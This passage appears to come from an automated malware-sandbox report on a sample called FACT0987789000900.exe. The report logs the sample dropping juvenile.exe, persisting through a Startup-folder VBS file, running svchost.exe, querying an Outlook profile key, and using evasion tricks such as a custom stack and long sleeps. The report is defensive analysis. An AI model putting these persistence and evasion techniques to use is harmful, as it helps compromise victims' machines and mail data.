Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: _.pdb source: svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: juvenile.exe, 00000006.00000003.1318218958.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000006.00000003.1318472638.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445535094.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445352586.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: juvenile.exe, 00000006.00000003.1318218958.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000006.00000003.1318472638.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445535094.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445352586.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004AE01E LoadLibraryA,GetProcAddress,

3_2_004AE01E

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_005205B8 push ss; ret	3_2_005205B9
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004B6B05 push ecx; ret	3_2_004B6B18
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_009605B8 push ss; ret	6_2_009605B9
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008F6B05 push ecx; ret	6_2_008F6B18
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_015664B1 push ebp; retf	6_2_015664B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0041C40C push cs; iretd	8_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00423149 push eax; ret	8_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0041C50E push cs; iretd	8_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004231C8 push eax; ret	8_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040E21D push ecx; ret	8_2_0040E230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0041C6BE push ebx; ret	8_2_0041C6BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFE558 push eax; iretd	8_2_04FFE559
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_0041C40C push cs; iretd	11_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00423149 push eax; ret	11_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_0041C50E push cs; iretd	11_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_004231C8 push eax; ret	11_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_0040E21D push ecx; ret	11_2_0040E230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_0041C6BE push ebx; ret	11_2_0041C6BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBE558 push eax; iretd	11_2_07CBE559
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AC4F9 push 00000008h; iretd	11_2_086AC4FC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AC4AA push 00000008h; iretd	11_2_086AC4AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A9B51 push 00000008h; retf	11_2_086A9BE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A9BC8 push 00000008h; retf	11_2_086A9BE8

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\FACT0987789000900.exe

File created: C:\Users\user\AppData\Local\thixolabile\juvenile.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Jump to behavior

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004F8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	3_2_004F8111
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004AEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	3_2_004AEB42
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00938111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	6_2_00938111
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008EEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	6_2_008EEB42

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004B123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_004B123A

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	API/Special instruction interceptor: Address: 1569A24
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	API/Special instruction interceptor: Address: 126550C

Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 4FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 7540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 7790000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

8_2_004019F0

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599670	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599558	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598672	Jump to behavior
